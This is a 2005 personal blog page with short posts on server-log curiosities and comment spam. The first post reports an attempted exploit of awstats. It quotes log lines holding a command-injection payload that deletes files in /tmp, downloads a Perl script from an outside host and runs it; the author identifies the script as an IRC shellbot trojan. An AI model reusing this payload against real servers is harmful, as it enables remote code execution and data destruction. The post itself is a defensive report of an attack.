This page looks plain and unstyled because you're using a non-standard compliant browser. To see it in its best form, please upgrade to a browser that supports web standards. It's free and painless.

Paul's Time Sink

| Main | Albums |

potential security hole in awstats [updated]

Paul Westbrook | 08 July, 2005 22:03

I noticed the following entries in my log file:

66.139.73.109 - - [09/Jul/2005:00:01:37 -0700] "GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;
killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;
rm%20-rf%20a.txt*;echo| HTTP/1.1" 200 749 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.139.73.109 - - [09/Jul/2005:00:01:38 -0700] "GET /cgi/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;
killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;
rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 1061 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.139.73.109 - - [09/Jul/2005:00:01:39 -0700] "GET /stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;
killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;
rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 1061 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.139.73.109 - - [09/Jul/2005:00:01:39 -0700] "GET /stats/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;
killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;
rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 1061 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.139.73.109 - - [09/Jul/2005:00:01:39 -0700] "GET /stats/cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;
killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;
rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 1061 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

It appears that this person is attempting to have awstats download a perl script and have it executed on the web server.  When I looked at the script that it is attempting to download, it attempts to connect to an irc server and sends information there. (ClamAV identifies this script as "Trojan.Perl.Shellbot.C")
 (More)

Computer :: Comment (1) :: Permalink :: Trackbacks (0)

DNS Anti Spam plugin

Paul Westbrook | 08 July, 2005 20:09

I have just enabled the DNS Anti Spam plugin to catch comment spam that isn't stopped with the bayesian filter.  This plugin does some dns checks to determine if:

  1. The ip address is from a known spammer on sorbs.net, spamhaus.org, or dsbl.org.
  2. The title, body text, or the username has a url that is known to be sent out as spam at surbl.org
  3. The url is known to be sent out as spam at surbl.org

Technorati Tags: , ,

Blogging :: Comment (0) :: Permalink :: Trackbacks (0)

blog comment spam schedule?

Paul Westbrook | 08 July, 2005 15:39

I was curious about what type of comments were being caught in the bayesian spam filter that pLog has, so I change my setting to keep the spam messages (still marked as spam) instead of deleting them.  On thing that I noticed is that it appears that on the 27th minute after the hour, I batch of spam comments get posted.  (All of them are caught by the filter.)

If I have the 27th minute, I wonder who has the top of the hour.

Technorati Tags: , ,

Computer :: Comment (0) :: Permalink :: Trackbacks (0)

Google as a referrer?

Paul Westbrook | 08 July, 2005 14:02

I have noticed someone doing something strange.  They have configured their browser to report the referrer as Google.

XXX.XX.XX.XX - - [08/Jul/2005:16:26:28 -0700] "GET /index.php?op=ViewArticle&articleId=492&blogId=2 HTTP/1.0" 200 28062 "http://www.google.com/" "Mozilla (X11; I; Linux 2.0.32 i586)"

I can't image that there are web servers that allow different content when the referrer is the home page of Google.  Especially since most valid referrers from Google will contain a the search query.  (I really doubt that I am listed on Google's main page.)

Computer :: Comment (1) :: Permalink :: Trackbacks (0)
Powered by LifeType
Design by Book of Styles